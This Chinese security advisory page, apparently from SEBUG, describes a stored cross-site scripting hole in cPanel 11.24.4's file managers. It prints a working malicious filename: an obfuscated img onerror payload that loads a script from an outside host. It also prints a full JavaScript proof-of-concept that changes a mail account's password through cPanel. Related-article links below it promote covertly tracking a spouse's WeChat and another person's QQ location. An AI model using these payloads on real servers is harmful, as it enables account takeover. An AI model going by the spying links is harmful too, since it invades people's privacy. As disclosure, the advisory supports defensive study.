cPanel文件管理器文件名HTML注入漏洞
影响版本:
cPanel 11.24.4-CURRENT
漏洞描述:
BUGTRAQ ID: 34142
cPanel是基于web的工具,用于自动化控制网站和服务器。
Cpanel内嵌有两个文件管理器,分别为标准和旧式文件管理器。这两个文件管理器在处理文件名时存在跨站脚本漏洞,远程攻击者可以通过创建特制的文件名注入并执行脚本。
对于旧式文件管理器,只要查看了文件列表就可以执行攻击者的代码;对于标准文件管理器,文件列表经过转义,但如果用户对恶意文件执行了删除、拷贝、移动、重新命名等任务的话,仍可能执行注入的脚本。
由于文件名中禁用斜线字符,因此攻击者无法直接使用<script>标签加载脚本。为了摆脱这个限制,攻击者可以通过<img>标签onError属性注入脚本并将src属性设置为空字符串来强制触发出错事件。通过<img>标签注入的脚本生成<script>标签,使用document.write()函数执行外部脚本。 <*参考
Rizki Wicaksono (rizki.wicaksono@gmail.com)
http://marc.info/?l=bugtraq&m=123730614528241&w=2.
*>
SEBUG安全建议:
厂商补丁:
cPanel
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.cpanel.net.
测试 *** :
[www.sebug.net]
本站提供程序( *** )可能带有攻击性,仅供安全研究与教学之用,风险自负!
恶意文件名:
<img src=\'\' onerror=\'document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,105,108,109,117,104,97,99,107,105,110,103,46,99, 111,109,47,120,46,106,115,62,60,47,115,99,114,105,112,116,62))\'>
该<img>生成以下html标签,以导致浏览器加载并执行外部脚本:
<script src=http://ilmuhacking.com/x.js></script>
PoC负载:
----------------
var http_request = false;
function makePOSTRequest(url, parameters) {
http_request = false;
if (window.XMLHttpRequest) { // Mozilla, Safari,...
http_request = new XMLHttpRequest();
if (http_request.overrideMimeType) {
http_request.overrideMimeType(\'text/html\');
}
} else if (window.ActiveXObject) { // IE
try {
http_request = new ActiveXObject(\"Msxml2.XMLHTTP\");
} catch (e) {
try {
http_request = new ActiveXObject(\"Microsoft.XMLHTTP\");
} catch (e) {}
}
}
if (!http_request) {
alert(\'Cannot create XMLHTTP instance\');
return false;
}
http_request.onreadystatechange = alertContents;
http_request.open(\'POST\', url, true);
http_request.setRequestHeader(\"Content-type\", \"application/x-www-form-urlencoded\");
http_request.setRequestHeader(\"Content-length\", parameters.length);
http_request.setRequestHeader(\"Connection\", \"close\");
http_request.send(parameters);
}
function alertContents() {
if (http_request.readyState == 4) {
if (http_request.status == 200) {
result = http_request.responseText;
alert(result);
} else {
alert(\'There was a problem with the request.\');
}
}
}
var poststr = \"quota=\" + encodeURI(\"250\") + \"&password2=\" + encodeURI(\"newpassword\") \\
+
\"&password=\" + encodeURI(\"newpassword\") + \"&email=\" + encodeURI(\"testemail\") +
\"&domain=\" + encodeURI(\"ilmuhacking.com\");
makePOSTRequest(\'/frontend/x3/mail/dopasswdpop.html\', poststr);
相关文章
怎么关联老婆的微信号 黑客手把手教你同步老婆微信
据外媒,在Linux基金会的牵头下,新成立的开源软件安全基金会(OpenSSF)旨在将广泛的社区领导者聚集到一起,建立具有针对性的计划和最佳实践,以提升开源软件的安全性。 OpenSSF...
密码朋克:用代码建造 乌托邦的人_可以查看
提到朋克精神,想必都不会陌生。 上世纪八九十年代,朋克作为亚文化开始流行起来,而它的表现形式,常常与音乐、服装、电影甚至文学联系在一起。说起对朋克的第一印象,大多数人可能第一反应是夸张的发型、纹...
华为董事长胡厚崑表示华为从未发生过任何严重的网络安全问题_还可以
据Mobile World Live报道,华为轮值董事长胡厚崑呼吁有关政府给出禁止中国设备的证据,从而证明所谓的安全威胁,并打开沟通渠道,这样公司才能采取行动。但是华为发现,许多国家并没有这么做。...
不惊动对方怎么通过QQ查看对方的位置信息?
如何通过QQ聊天追踪对方的准确地理位置呢?以前被称为“珊瑚虫”的程序很容易安装,但现在随着QQ的进化,万能的“珊瑚虫”已经不再合适。下面的编辑告诉你用最初的方法得到对方的IP地址。这个方法是使用内置在...
90后偷遍优衣库 有名的鸳鸯大盗_聊天记录
日前,苏州吴中警方抓获一对90后“鸳鸯暴徒”,他们在发现***自选式打扮店办理缝隙后,网购了资料便宜一个能够屏蔽防盗门信号手提包。之后,从南到北横扫二十余省市、自治区***连锁店,无一失手。现代快报记...
超级隐私模式 | Mozilla Firefox将很快获得包含Tor模式的扩展组件_黑客浏览器
据外媒报道,Firefox浏览器可能很快就会收到一个Tor模式的附加组件,它将通过连接Tor网络显著增强隐私功能。 虽然Mozilla和Tor团队的最终目标是在浏览器上实现完整功能的Tor模式,但这...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!